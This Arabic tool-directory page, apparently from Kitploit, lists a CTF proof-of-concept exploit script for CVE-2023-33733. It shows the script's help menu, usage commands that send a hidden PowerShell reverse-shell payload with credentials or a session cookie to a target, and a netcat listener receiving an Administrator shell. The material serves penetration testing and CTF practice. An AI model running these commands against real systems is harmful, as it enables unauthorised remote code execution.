Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-33733-Exploit-PoC — سكربت استغلال بايثون لـ CVE-2023-33733 يستهدف تطبيقات الويب. يقوم بأتمتة المصادقة واستخراج الجلسة وتسليم الشل العكسي لبيئات اختبار الاختراق وCTF. | Kitploit
أدوات/GitHubGitHub/l41kaa/cve-2023-33733-exploit-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراق
GitHubl41kaa/cve-2023-33733-exploit-poc

CVE-2023-33733-Exploit-PoC

سكربت استغلال بايثون لـ CVE-2023-33733 يستهدف تطبيقات الويب. يقوم بأتمتة المصادقة واستخراج الجلسة وتسليم الشل العكسي لبيئات اختبار الاختراق وCTF.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
315منذ 2 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2023-33733-POC

إخلاء مسؤولية

لم أكتشف هذه الثغرة الأمنية، ولا أنسب لنفسي الفضل في العثور عليها. هذا مجرد سكربت أنشأته لاستغلال هذه الثغرة بسهولة أكبر في مسابقة CTF. للمعلومات الأصلية، يرجى الرجوع إلى: https://github.com/c53elyas/CVE-2023-33733

هذا السكربت مصمم ببساطة ليكون سكربت Python3 سريعًا لاستغلال CVE-2023-33733. ستحتاج إلى توفير المضيف (host) والمنفذ (port) والأمر (command) وملف تعريف ارتباط جلسة صالح (session cookie).

قائمة المساعدة

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --help 
usage: foothold.py [-h] --host HOST --port PORT --cmd CMD --session SESSION

options:
  -h, --help            show this help message and exit
  --host HOST
  --port PORT, -p PORT
  --cmd CMD, -c CMD
  --username USERNAME, -u USERNAME
  --password PASSWORD, -ps PASSWORD
  --session SESSION, --cookie SESSION, -sc SESSION
                        Session cookie

طريقة الاستخدام

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --username "<your username here>" --password "<your password here>"
[*] Logging in to http://vuln.server:80
Retreived session cookie: SESSION=...
[*] Extracting session token...
[*] Token extracted:  .abc.xyz
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 504


kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --session "<your cookie here>"
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 500


# المستمع
kali@kali:~/Desktop$ nc -lnvp 9001
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.1] 50246
whoami
Administrator
تنزيل الأداة